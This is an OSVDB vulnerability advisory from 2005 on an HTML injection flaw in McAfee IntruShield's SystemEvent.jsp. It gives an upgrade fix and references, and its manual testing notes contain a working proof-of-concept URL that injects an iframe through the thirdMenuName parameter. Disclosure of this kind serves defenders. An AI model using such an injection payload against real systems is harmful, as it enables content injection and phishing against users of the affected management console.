McAfee IntruShield SystemEvent.jsp Arbitrary HTML Injection

2005-07-06T14:57:41
ID OSVDB:17770
Type osvdb
Reporter OSVDB
Modified 2005-07-06T14:57:41

Description

Solution Description

Upgrade to version 2.1.9.17 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

https://[target]/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&domainName=%2FDemo%3A0&resourceName=%2FDemo%3A0%2FManager&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=<iframe%20src="http://www.mcafeesecurity.com/us/about/press/corporate/2005/20050411_185504.htm"%20width=800%20height=600></iframe>&severity=critical&count=1

References:

Vendor URL: http://www.mcafeesecurity.com/us/products/mcafee/network_ips/category.htm
Security Tracker: 1014422
Secunia Advisory ID: 15961
Related OSVDB ID: 17771
Related OSVDB ID: 17772
Related OSVDB ID: 17773
Related OSVDB ID: 17774
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-07/0052.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-07/0153.html
CVE-2005-2186